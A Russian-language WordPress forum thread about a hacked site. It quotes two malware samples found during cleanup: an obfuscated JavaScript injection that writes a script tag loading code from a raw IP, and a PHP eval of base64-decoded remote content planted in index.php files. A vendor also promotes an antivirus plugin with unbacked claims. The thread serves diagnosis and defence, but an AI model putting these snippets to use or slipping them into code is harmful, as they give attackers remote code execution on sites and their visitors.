Было дело как-то с подобной JS инъекцией сталкивался.
Проверьте с помощью ai-bolit файлы сайта, в файле отчета, скорее всего появятся такие строки:
var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))
Скорее всего какой-то плагин зараженный поставили.
Что то не находит Айболит. и с помощью поиска по файлам не найти var _0xaae8=
Во всех index.php был такой код
{
$server=1;
eval(file_get_contents(base64_decode(‘aHR0cDovL3F0My5wdy93P3U9’).$s[‘HTTP_HOST’]));
}
Видимо это оно
Добрый день,
Используйте наш продукт,
CWIS ANTIVRUS он как раз и находит даже то что не находит AIBOLIT.
https://wordpress.org/plugins/cwis-antivirus-malware-detected/
Если есть вопросы, буду рад помочь.
он как раз и находит даже то что не находит AIBOLIT.
Например что?
Вот вышеупомянутый eval(file_get_contents(base64
айболит находит.
Я не собераюсь что то доказывать, скачайте и сравните.
но то что 100 процентов он не находит, то это в базе данных,я не знаком с другим продуктом который сканирует базу данных.
и я уже не говарю о количестве ложных срабатывании по сровнению CWIS ANTIVIRUS.
Я не собераюсь что то доказывать
Даже Ваши голословные утверждения: «он как раз и находит даже то что не находит AIBOLIT.»
Это прелестно 🙂
скачайте
Бинарник с неизвестными внутреннностями? Нет уж, увольте. Я пока ещё не дожил до такого, чтобы тянуть всякое непонятно от кого. Даже из оф. репо ВП.